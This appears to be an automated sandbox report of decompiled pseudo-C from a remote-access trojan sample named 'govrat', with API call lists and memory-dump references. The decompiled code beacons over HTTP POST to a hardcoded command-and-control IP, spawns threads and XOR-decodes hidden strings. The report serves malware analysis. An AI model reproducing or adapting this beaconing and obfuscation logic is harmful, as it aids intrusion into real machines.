    														_t62 = CloseHandle( *0x972f10);
    														_push(0);
    														_push(0);
    														_push(1);
    														_push(0);
    														_push(0);
    														_t63 = L0099C977(_t62, 0, __eflags);
    														_push( &_v12);
    														_push(0);
    														_push(_t63);
    														_push(0x95ff4d);
    														_push(0);
    														_push(0);
    														 *0x972f0c = _t63;
    														return L0099D5F1(_t63, _t84, 1);
    													} else {
    														_push(_t60);
    														return L009E7129(_t60, __ecx, __edx);
    													}
    												}
    											} else {
    												_push(0);
    												_push(0);
    												_push(0);
    												_push(E009687B6);
    												_push(0);
    												_push(0);
    												_push(__ecx); // executed
    												_t41 = L009D2BA7(_t41); // executed
    												 *0x972f08 = _t41;
    												goto L39;
    											}
    										} else {
    											goto L11;
    										}
    									} else {
    										_t66 =  *0x9759a8; // 0x41ae60
    										_t67 =  *(_t66 + 8);
    										__eflags = _t67 - 0xffffffff;
    										if(__eflags != 0) {
    											CloseHandle(_t67);
    											_t69 =  *0x9759a8; // 0x41ae60
    											 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
    										}
    										L11:
    										_push(0);
    										_t41 = L0096089D(_t71, 1, _t91, __eflags);
    										goto L39;
    									}
    								} else {
    									_push(0);
    									_push(1);
    									_t41 = L009B9419(_t41, 1);
    									goto L39;
    								}
    							}
    						}
    					}
    				} else {
    					return L009A38ED(_t41, __ebx, 1);
    				}
    				goto L40;
    			}

    C-Code - Quality: 41%
    			E00958704(void* __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __ebx;
    				void* __esi;
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr* _t14;
    				intOrPtr _t15;
    				void* _t18;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				void* _t22;
    				void* _t25;
    				void* _t27;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t34;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				intOrPtr* _t43;
    				intOrPtr* _t44;
    				void* _t48;
    
    				_t36 = __edx;
    				_t43 = _t42;
    				L00A01FCC(_t11, _t27, _t43);
    				_t13 =  *_t43( *0x976b28, _t37, _t27, __ecx, _t48); // executed
    				_t28 = _t13;
    				_v8 = _t28;
    				_t14 =  *_t43( *0x976b24); // executed
    				_t44 = _t14;
    				if(_t44 < _t28) {
    					L12:
    					_t15 = 0;
    				} else {
    					_t40 = _t44 - _t28;
    					_t2 = _t40 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L12;
    					} else {
    						_t30 = L0095B067(_t28);
    						_t3 = _t40 + 4; // 0x4
    						_t18 = _t3;
    						if(_t30 >= _t18) {
    							L0098624A(_t30, _t44); // executed
    							_t20 =  *_t40(_t18, _a4); // executed
    							 *_t44 = _t20;
    							_t21 =  *_t40(_t44 + 4); // executed
    							 *0x976b24 = _t21;
    							_t15 = _a4;
    						} else {
    							_t22 = 0x800;
    							if(_t30 < 0x800) {
    								_t22 = _t30;
    							}
    							_t23 = _t22 + _t30;
    							if(_t22 + _t30 >= _t30) {
    								_t25 = L00959022(_v8, _t23);
    								_pop(_t34);
    								if(_t25 != 0) {
    									L9:
    									_push(_t25);
    									return L009F75EB(_t25, _t34, _t36);
    								}
    							}
    							_t5 = _t30 + 0x10; // 0x10
    							_t24 = _t5;
    							if(_t5 >= _t30) {
    								_t25 = L00959022(_v8, _t24);
    								_pop(_t34);
    								if(_t25 != 0) {
    									goto L9;
    								}
    							}
    							goto L12;
    						}
    					}
    				}
    				return _t15;
    			}

    APIs
    • RtlDecodePointer.NTDLL(?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 00958719
    • RtlDecodePointer.NTDLL(?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 00958726
      • Part of subcall function 00959022: Sleep.KERNEL32(00000000,00000000,00000000,?,0095877E,00000000,00000010,?,?,?,?,00958808,?,00970BC0,0000000C,00958834), ref: 0095904C
    • RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 0095879F
    • RtlEncodePointer.NTDLL(-00000004,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 009587A7
    C-Code - Quality: 44%
    			E00961539(void* __edx, void* __edi, void* __eflags) {
    				void* _t9;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t20;
    				void* _t21;
    
    				_t21 = __eflags;
    				_t18 = __edx;
    				_t9 = CreateThread(0, 0, 0x95fa1a, 0, 0, _t20 - 8); // executed
    				CloseHandle(_t9);
    				_t12 = CreateThread(0, 0, E0095F9B1, 0, 0, _t20 - 8); // executed
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(_t18);
    				_t13 = L00A00B1B(_t12, _t18, _t21);
    				 *0x972f0c = _t13; // executed
    				_t14 = CreateThread(0, 0, 0x95ff4d, _t13, 0, _t20 - 8); // executed
    				 *0x972f10 = _t14;
    				_push( *((intOrPtr*)(_t20 + 0x14)));
    				_push( *((intOrPtr*)(_t20 + 0x10)));
    				_push( *((intOrPtr*)(_t20 + 0xc)));
    				_push( *((intOrPtr*)(_t20 + 8)));
    				return L00986584(_t14);
    			}

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_0000FA1A,00000000,00000000,?), ref: 00961548
    • CloseHandle.KERNEL32(00000000), ref: 0096154B
    • CreateThread.KERNEL32(00000000,00000000,Function_0000F9B1,00000000,00000000,?), ref: 0096155E
    • CreateThread.KERNEL32(00000000,00000000,Function_0000FF4D,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0096157C
    C-Code - Quality: 87%
    			E0095C931(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				intOrPtr _v12;
    				char _v16;
    				short _v20;
    				short _v22;
    				short _v24;
    				short _v26;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				short _v54;
    				short _v56;
    				short _v58;
    				short _v60;
    				short _v62;
    				short _v64;
    				short _v66;
    				short _v68;
    				short _v70;
    				char _v72;
    				char _v82;
    				short _v84;
    				short _v86;
    				short _v88;
    				short _v90;
    				intOrPtr _v94;
    				short _v96;
    				short _v98;
    				short _v100;
    				short _v102;
    				short _v104;
    				intOrPtr _v108;
    				short _v110;
    				short _v112;
    				short _v114;
    				short _v116;
    				short _v118;
    				short _v120;
    				short _v122;
    				short _v124;
    				short _v126;
    				short _v128;
    				short _v130;
    				short _v132;
    				short _v134;
    				short _v136;
    				short _v138;
    				short _v140;
    				intOrPtr _v144;
    				short _v146;
    				short _v148;
    				short _v150;
    				short _v152;
    				short _v154;
    				short _v156;
    				short _v158;
    				short _v160;
    				short _v162;
    				short _v164;
    				short _v166;
    				short _v168;
    				short _v170;
    				short _v172;
    				short _v174;
    				short _v176;
    				short _v178;
    				short _v180;
    				short _v182;
    				short _v184;
    				short _v186;
    				short _v188;
    				short _v190;
    				short _v192;
    				short _v194;
    				short _v196;
    				short _v198;
    				short _v200;
    				short _v202;
    				short _v204;
    				short _v206;
    				short _v208;
    				short _v210;
    				short _v212;
    				short _v214;
    				intOrPtr _v218;
    				short _v220;
    				short _v222;
    				short _v224;
    				short _v226;
    				short _v228;
    				short _v230;
    				short _v232;
    				short _v234;
    				short _v236;
    				short _v238;
    				short _v240;
    				short _v242;
    				short _v244;
    				short _v246;
    				short _v248;
    				short _v250;
    				short _v252;
    				short _v254;
    				short _v256;
    				short _v258;
    				intOrPtr _v262;
    				intOrPtr _v266;
    				short _v268;
    				short _v270;
    				short _v272;
    				short _v274;
    				intOrPtr _v278;
    				intOrPtr _v282;
    				char _v284;
    				signed int _v288;
    				char _v292;
    				char _v304;
    				intOrPtr _v312;
    				char _v316;
    				char _v320;
    				char _v836;
    				char _v1348;
    				void* __edi;
    				void* __esi;
    				short _t202;
    				short _t203;
    				short _t204;
    				short _t205;
    				short _t206;
    				short _t207;
    				short _t208;
    				intOrPtr _t234;
    				intOrPtr _t235;
    				intOrPtr _t243;
    				intOrPtr _t244;
    				intOrPtr _t245;
    				intOrPtr _t246;
    				intOrPtr _t247;
    				intOrPtr _t249;
    				intOrPtr _t253;
    				intOrPtr _t255;
    				char _t256;
    				intOrPtr _t258;
    				char* _t261;
    				intOrPtr _t270;
    				intOrPtr _t275;
    				intOrPtr _t277;
    				short _t323;
    				short _t324;
    				short _t325;
    				short _t326;
    				void* _t335;
    				void* _t336;
    				intOrPtr _t387;
    
    				_t336 = __edx;
    				_t202 = 0x68;
    				_v72 = _t202;
    				_t203 = 0x74;
    				_v288 = _v288 & 0x00000000;
    				_v70 = _t203;
    				_v68 = _t203;
    				_t204 = 0x70;
    				_v66 = _t204;
    				_t205 = 0x3a;
    				_v64 = _t205;
    				_t206 = 0x2f;
    				_v62 = _t206;
    				_v60 = _t206;
    				_t207 = 0x25;
    				_v58 = _t207;
    				_t208 = 0x53;
    				_v56 = _t208;
    				_v54 = 0;
    				_v292 = L"*/*";
    				L00951000(0x200, L"%S", "192.243.101.124");
    				L00951000(0x200,  &_v72, "192.243.101.124");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if( *0x975968 != 0) {
    					L4:
    					_v84 = 0x8c;
    					_v86 = 0xba;
    					_v96 = 0xb9;
    					_v98 = 0xa3;
    					_v100 = 0xe5;
    					_v88 = 0xbf;
    					_v102 = 0xfe;
    					_v90 = 0xbf;
    					_v104 = 0xed;
    					_v110 = 0xdf;
    					_v112 = 0xac;
    					_v114 = 0xbc;
    					_v116 = 0xbf;
    					_v118 = 0xb4;
    					_v124 = 0xbe;
    					_v126 = 0xbf;
    					_v128 = 0xbc;
    					_v130 = 0xbf;
    					_v146 = 0xe4;
    					_v132 = 0xbd;
    					_v148 = 0xcf;
    					_v120 = 0xbe;
    					_v122 = 0xbe;
    					_v134 = 0xb8;
    					_v150 = 0xac;
    					_v136 = 0xa3;
    					_v138 = 0xe9;
    					_v152 = 0xa5;
    					_v140 = 0xe1;
    					_v154 = 0xe3;
    					_v156 = 0xe7;
    					_v158 = 0xef;
    					_v160 = 0xe9;
    					_v162 = 0xcb;
    					_v164 = 0xac;
    					_v94 = 0xbb00bf;
    					_v108 = 0xea00ed;
    					_v144 = 0xe300fe;
    					_v166 = 0xe9;
    					_v168 = 0xe7;
    					_v170 = 0xe5;
    					_v172 = 0xe0;
    					_v174 = 0xac;
    					_v176 = 0xa0;
    					_v178 = 0xc0;
    					_v180 = 0xc1;
    					_v182 = 0xd8;
    					_v184 = 0xc4;
    					_v186 = 0xc7;
    					_v188 = 0xa4;
    					_v190 = 0xac;
    					_v192 = 0xba;
    					_v194 = 0xbf;
    					_v196 = 0xbf;
    					_v198 = 0xbb;
    					_v200 = 0xbf;
    					_v202 = 0xb9;
    					_v204 = 0xa3;
    					_v206 = 0xf8;
    					_v208 = 0xe5;
    					_v210 = 0xc7;
    					_v212 = 0xee;
    					_v220 = 0xe0;
    					_v224 = 0xfc;
    					_v214 = 0xe9;
    					_v226 = 0xcd;
    					_v228 = 0xac;
    					_v230 = 0xa5;
    					_v232 = 0xbd;
    					_v234 = 0xa2;
    					_v236 = 0xba;
    					_v238 = 0xac;
    					_v240 = 0xd8;
    					_v242 = 0xc2;
    					_v244 = 0xac;
    					_v246 = 0xff;
    					_v248 = 0xfb;
    					_v218 = 0xdb00e9;
    					_v222 = 0xfc;
    					_v250 = 0xe3;
    					_v252 = 0xe8;
    					_v268 = 0xb9;
    					_v254 = 0xe2;
    					_v270 = 0xa3;
    					_v256 = 0xe5;
    					_v272 = 0xed;
    					_v258 = 0xdb;
    					_v274 = 0xe0;
    					_v284 = 0xc1;
    					_t387 = 1;
    					_v262 = 0xa400ac;
    					_v266 = 0xbc00a2;
    					_v278 = 0xe000e5;
    					_v282 = 0xf600e3;
    					_v82 = 0;
    					_t234 =  *0x975968; // 0x1b1640, executed
    					_t235 =  *((intOrPtr*)(_t234 + 0x18))(L0095113A( &_v284), 1, 0, 0, 0);
    					 *0x9759c0 = _t235;
    					if(_t235 == 0) {
    						L20:
    						 *_a8 = 0x50;
    						if(L0095C8AE(_a4, "192.243.101.124") == 0) {
    							L3:
    							return 0;
    						}
    						L00951000(0x200, L"%S", _a4);
    						L22:
    						_t243 =  *0x975968; // 0x1b1640, executed
    						_t244 =  *((intOrPtr*)(_t243 + 0x14))( *0x9759c0,  &_v1348, 0x50, 0);
    						 *0x9759c4 = _t244;
    						if(_t244 == 0) {
    							goto L3;
    						}
    						_t323 = 0x50;
    						_v28 = _t323;
    						_t324 = 0x4f;
    						_v26 = _t324;
    						_t325 = 0x53;
    						_v24 = _t325;
    						_t326 = 0x54;
    						_v22 = _t326;
    						_v20 = 0;
    						_t245 =  *0x975968; // 0x1b1640, executed
    						_t246 =  *((intOrPtr*)(_t245 + 0x1c))(_t244,  &_v28, L"/index.html", 0, 0,  &_v292, 0);
    						 *0x9759bc = _t246;
    						if(_t246 == 0) {
    							L19:
    							_t247 =  *0x975968; // 0x1b1640
    							 *((intOrPtr*)(_t247 + 0x28))( *0x9759c0);
    							goto L3;
    						}
    						_t249 =  *0x975968; // 0x1b1640
    						 *((intOrPtr*)(_t249 + 0xc))(_t246, 0x2710, 0x2710, 0x927c0, 0x927c0);
    						return _t387;
    					}
    					_push( &_v320);
    					_t253 =  *0x975968; // 0x1b1640, executed
    					if( *((intOrPtr*)(_t253 + 4))() == 0) {
    						goto L20;
    					}
    					_t255 = _v312;
    					if(_t255 != 0) {
    						_v12 = _t255;
    						_v16 = 3;
    						_v8 = 0;
    					}
    					_t256 = _v316;
    					if(_t256 != 0) {
    						_v44 = _t256;
    						_push( &_v304);
    						_push( &_v52);
    						_push( &_v836);
    						_push( *0x9759c0);
    						_t275 =  *0x975968; // 0x1b1640
    						_v52 = 2;
    						_v48 = 0;
    						_v32 = _t387;
    						_v40 = 0;
    						_v36 = 0;
    						if( *((intOrPtr*)(_t275 + 0x20))() != 0) {
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							_t387 = 1;
    						}
    					}
    					if(_v320 != 0) {
    						_push( &_v304);
    						_push( &_v52);
    						_push( &_v836);
    						_push( *0x9759c0);
    						_t270 =  *0x975968; // 0x1b1640
    						_v52 = _t387;
    						_v48 = 3;
    						_v32 = _t387;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						if( *((intOrPtr*)(_t270 + 0x20))() != 0) {
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							_t387 = 1;
    						}
    					}
    					if(_v12 == 0) {
    						goto L20;
    					} else {
    						_t258 =  *0x975968; // 0x1b1640
    						 *((intOrPtr*)(_t258 + 8))( *0x9759c0, 0x26,  &_v16, 0xc);
    						_t380 = _a4;
    						L009510F7(0x20, "%S", _v12);
    						_t261 = E00951240(_a4, 0x3a);
    						if(_t261 == 0) {
    							 *_a8 = 0x1f90;
    						} else {
    							 *_t261 = 0;
    							L0095207D(_t261 + 1, "%d", _a8);
    						}
    						if(L0095C8AE(_t380, _t380) != 0) {
    							goto L22;
    						} else {
    							goto L19;
    						}
    					}
    				}
    				_t277 = E00951195(_t336,  &_v320, "192.243.101.124", 0x34);
    				_pop(_t335);
    				 *0x975968 = _t277;
    				if(_t277 == 0 || E00965B62(_t335, _t277) == 0) {
    					goto L3;
    				} else {
    					goto L4;
    				}
    			}

    APIs
    • _swscanf.LIBCMT ref: 0095CEA3
      • Part of subcall function 00965B62: GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 00965C05
      • Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965C73
      • Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965C9E
      • Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965CCF
      • Part of subcall function 00965B62: GetProcAddress.KERNEL32(?,?), ref: 00965D07
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 79%
    			E009579FA(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				void* __ebx;
    				void* __esi;
    				signed int _t50;
    				void* _t51;
    				signed int _t53;
    				void* _t54;
    				void* _t56;
    				signed int _t57;
    				void* _t58;
    				signed int* _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr* _t69;
    				void* _t81;
    				signed char _t83;
    				void* _t86;
    				void* _t91;
    				intOrPtr* _t94;
    				unsigned int _t96;
    				intOrPtr* _t102;
    				signed int _t103;
    				void* _t105;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t113;
    				intOrPtr* _t114;
    				void* _t119;
    
    				_t105 = __edi;
    				_t102 = __edx;
    				if( *0x976b2c == 0) {
    					_t50 = L00952EFF(__ecx);
    				}
    				_t111 =  *0x973240; // 0x0
    				_push(_t105);
    				_t106 = 0;
    				if(_t111 != 0) {
    					while(1) {
    						_t51 =  *_t111;
    						if(_t51 == 0) {
    							break;
    						}
    						if(_t51 != 0x3d) {
    							_t106 = _t106 + 1;
    						}
    						_t111 = _t111 + L009563C0(_t111) + 1;
    					}
    					_t50 = E00958FD6(_t106 + 1, 4);
    					_t108 = _t50;
    					_pop(_t91);
    					 *0x973260 = _t108;
    					if(_t108 == 0) {
    						goto L3;
    					} else {
    						_t113 =  *0x973240; // 0x0
    						while( *_t113 != 0) {
    							_t54 = L009563C0(_t113);
    							_pop(_t91);
    							_t3 = _t54 + 1; // 0x1
    							_t81 = _t3;
    							if( *_t113 == 0x3d) {
    								L14:
    								_t113 = _t113 + _t81;
    								continue;
    							} else {
    								_t56 = E00958FD6(_t81, 1); // executed
    								_pop(_t91);
    								 *_t108 = _t56;
    								if(_t56 == 0) {
    									_t57 = E0095115B(_t91, _t102, _t113,  *0x973260);
    									 *0x973260 =  *0x973260 & 0x00000000;
    									_t53 = _t57 | 0xffffffff;
    									L17:
    									goto L18;
    								} else {
    									_t58 = L00951CDF(_t56, _t81, _t113);
    									_t119 = _t119 + 0xc;
    									if(_t58 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										L009538BA(_t81, _t108, _t113);
    										asm("int3");
    										_push(_t91);
    										_t94 = _v20;
    										_push(_t81);
    										_push(_t113);
    										 *_t108 = 0;
    										_t114 = _t102;
    										_t103 = _v24;
    										 *_t94 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t103;
    										}
    										_v8 = 0;
    										do {
    											if( *_t114 != 0x22) {
    												 *_t108 =  *_t108 + 1;
    												if(_t103 != 0) {
    													 *_t103 =  *_t114;
    													_a8 = _t103 + 1;
    												}
    												_t83 =  *_t114;
    												_t114 = _t114 + 1;
    												if(L0095B01C(_t83 & 0x000000ff) != 0) {
    													 *_t108 =  *_t108 + 1;
    													if(_a8 != 0) {
    														_a8 = _a8 + 1;
    														 *_a8 =  *_t114;
    													}
    													_t114 = _t114 + 1;
    												}
    												_t103 = _a8;
    												_t94 = _a12;
    												if(_t83 == 0) {
    													_t114 = _t114 - 1;
    												} else {
    													goto L33;
    												}
    											} else {
    												_t83 = 0x22;
    												_t114 = _t114 + 1;
    												_v8 = 0 | _v8 == 0x00000000;
    												goto L33;
    											}
    											L38:
    											_v8 = _v8 & 0x00000000;
    											L39:
    											while( *_t114 != 0) {
    												while(1) {
    													_t65 =  *_t114;
    													if(_t65 != 0x20 && _t65 != 9) {
    														break;
    													}
    													_t114 = _t114 + 1;
    												}
    												if( *_t114 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t103;
    													}
    													 *_t94 =  *_t94 + 1;
    													while(1) {
    														_t86 = 1;
    														_t96 = 0;
    														L50:
    														while( *_t114 == 0x5c) {
    															_t114 = _t114 + 1;
    															_t96 = _t96 + 1;
    														}
    														if( *_t114 == 0x22) {
    															if((_t96 & 0x00000001) == 0) {
    																if(_v8 == 0) {
    																	L56:
    																	_t86 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t69 = _t114 + 1;
    																	if( *_t69 != 0x22) {
    																		goto L56;
    																	} else {
    																		_t114 = _t69;
    																	}
    																}
    															}
    															_t96 = _t96 >> 1;
    														}
    														if(_t96 != 0) {
    															do {
    																_t96 = _t96 - 1;
    																if(_t103 != 0) {
    																	 *_t103 = 0x5c;
    																	_t103 = _t103 + 1;
    																}
    																 *_t108 =  *_t108 + 1;
    															} while (_t96 != 0);
    															_a8 = _t103;
    														}
    														_t66 =  *_t114;
    														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
    															if(_t86 != 0) {
    																_push(_t66);
    																if(_t103 == 0) {
    																	if(L0095B01C() != 0) {
    																		_t114 = _t114 + 1;
    																		 *_t108 =  *_t108 + 1;
    																	}
    																} else {
    																	if(L0095B01C() != 0) {
    																		_a8 = _a8 + 1;
    																		 *_a8 =  *_t114;
    																		_t114 = _t114 + 1;
    																		 *_t108 =  *_t108 + 1;
    																	}
    																	_a8 = _a8 + 1;
    																	 *_a8 =  *_t114;
    																}
    																 *_t108 =  *_t108 + 1;
    																_t103 = _a8;
    															}
    															_t114 = _t114 + 1;
    															_t86 = 1;
    															_t96 = 0;
    															goto L50;
    														}
    														if(_t103 != 0) {
    															 *_t103 = 0;
    															_t103 = _t103 + 1;
    															_a8 = _t103;
    														}
    														 *_t108 =  *_t108 + 1;
    														_t94 = _a12;
    														goto L39;
    													}
    												}
    												break;
    											}
    											_t64 = _a4;
    											if(_t64 != 0) {
    												 *_t64 =  *_t64 & 0x00000000;
    											}
    											 *_t94 =  *_t94 + 1;
    											return _t64;
    											goto L82;
    											L33:
    										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
    										if(_t103 != 0) {
    											 *((char*)(_t103 - 1)) = 0;
    										}
    										goto L38;
    									} else {
    										_t108 = _t108 + 4;
    										goto L14;
    									}
    								}
    							}
    							goto L82;
    						}
    						E0095115B(_t91, _t102, _t113,  *0x973240);
    						 *0x973240 =  *0x973240 & 0x00000000;
    						 *_t108 =  *_t108 & 0x00000000;
    						 *0x976b20 = 1;
    						_t53 = 0;
    						goto L17;
    					}
    				} else {
    					L3:
    					_t53 = _t50 | 0xffffffff;
    					L18:
    					return _t53;
    				}
    				L82:
    			}

    APIs
    • _strlen.LIBCMT ref: 00957A24
      • Part of subcall function 00958FD6: Sleep.KERNEL32(00000000), ref: 00958FFE
    • _strlen.LIBCMT ref: 00957A55
      • Part of subcall function 0095B01C: x_ismbbtype_l.LIBCMT ref: 0095B02A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 61%
    			E0095D22E(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				char _v28;
    				char _v30;
    				short _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				char _v48;
    				void* __ebp;
    				signed int _t22;
    				_Unknown_base(*)()* _t24;
    				void* _t25;
    				signed int _t28;
    				void* _t31;
    				struct HINSTANCE__* _t34;
    
    				_t31 = __edx;
    				_push( &_v28);
    				_v28 = 0x67616d49;
    				_v24 = 0x706c6865;
    				_v20 = 0x6c6c642e;
    				_v16 = 0;
    				_v48 = 0x63656843;
    				_v44 = 0x6d75536b;
    				_v40 = 0x7070614d;
    				_v36 = 0x69466465;
    				_v32 = 0x656c;
    				_v30 = 0;
    				_t22 = L009F6AD6( &_v28); // executed
    				_t34 = _t22;
    				if(_t34 != 0) {
    					_t12 =  &_v48; // 0x63656843
    					_t24 = GetProcAddress(_t34, _t12); // executed
    					if(_t24 == 0) {
    						_push(_t34);
    						return L009CE3CC(_t24, __edi);
    					}
    					_v12 = _v12 & 0x00000000;
    					_v8 = _v8 & 0x00000000;
    					_t25 =  *_t24(_a4, _a8,  &_v12,  &_v8);
    					_push(_t34);
    					return L00A057F5(_t25, _t31, __edi);
    				} else {
    					_t28 = _t22 | 0xffffffff;
    					return _t28;
    				}
    				goto L7;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,CheckSumMappedFileImagehlp.dll,?,?), ref: 0095D28E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 79%
    			E00962608(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* __ebp;
    				char* _t24;
    				void* _t25;
    				intOrPtr* _t27;
    				intOrPtr* _t29;
    				void* _t32;
    				intOrPtr* _t33;
    				intOrPtr* _t35;
    				intOrPtr* _t37;
    				intOrPtr* _t39;
    				void* _t42;
    				void* _t46;
    				void* _t54;
    
    				_t24 =  &_v8;
    				_push(_t24);
    				_push(0x970718);
    				_push(4);
    				_push(0);
    				_push(0x96c338);
    				_push(_t24); // executed
    				_t25 = E009AE582(); // executed
    				_t54 = _t25;
    				if(_t54 < 0) {
    					L11:
    					return _t54;
    				}
    				_t27 = _v8;
    				_t43 =  *_t27;
    				_t54 =  *((intOrPtr*)( *_t27 + 0x14))(_t27, 0x614);
    				if(_t54 < 0) {
    					L10:
    					_t29 = _v8;
    					 *((intOrPtr*)( *_t29 + 8))(_t29);
    					goto L11;
    				}
    				_v16 = 0;
    				_t32 = E00961EF0(_t43, _a4,  &_v16); // executed
    				_t54 = _t32;
    				_pop(_t46);
    				if(_t54 < 0) {
    					goto L10;
    				}
    				_v12 = 0;
    				if(_a8 != 0) {
    					_t42 = E00961EF0(_t46, _a8,  &_v12); // executed
    					_t54 = _t42;
    				}
    				if(_t54 >= 0) {
    					_t37 = _v8;
    					_t54 =  *((intOrPtr*)( *_t37 + 0x40))(_t37, _v16, _v12, _a12, 0);
    					_t39 = _v12;
    					if(_t39 != 0) {
    						 *((intOrPtr*)( *_t39 + 8))(_t39);
    					}
    				}
    				_t33 = _v16;
    				 *((intOrPtr*)( *_t33 + 8))(_t33);
    				if(_t54 >= 0) {
    					_t35 = _v8;
    					_t54 =  *((intOrPtr*)( *_t35 + 0x54))(_t35);
    				}
    				goto L10;
    			}

    APIs
    • ObjectStublessClient10.OLE32(?,00000614,?,0096C338,00000000,00000004,00970718,?), ref: 0096263E
      • Part of subcall function 00961EF0: SHParseDisplayName.SHELL32(?,00000000,?,20000000,00000000), ref: 00961F09
    • ObjectStublessClient10.OLE32(?,?,?,?,00000000), ref: 0096268A
    • ObjectStublessClient10.OLE32(?), ref: 009626AF
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 71%
    			E00961175(short __ebx, intOrPtr __edi) {
    				void* _t31;
    				void* _t33;
    				int _t36;
    				int _t41;
    				intOrPtr* _t44;
    				intOrPtr* _t47;
    				signed int _t51;
    				void* _t53;
    				WCHAR* _t59;
    				void* _t60;
    
    				_t58 = __edi;
    				 *((short*)(_t60 - 0x24)) = 0x331;
    				 *((short*)(_t60 - 0x26)) = 0x35f;
    				 *((short*)(_t60 - 0x28)) = __ebx;
    				 *((intOrPtr*)(_t60 - 0x2c)) = 0x3450343;
    				 *((intOrPtr*)(_t60 - 0x30)) = 0x35e037f;
    				 *((char*)(_t60 - 0x22)) = 0;
    				_t51 = 0;
    				do {
    					 *(_t60 + _t51 * 2 - 0x30) =  *(_t60 + _t51 * 2 - 0x30) ^ 0x00000331;
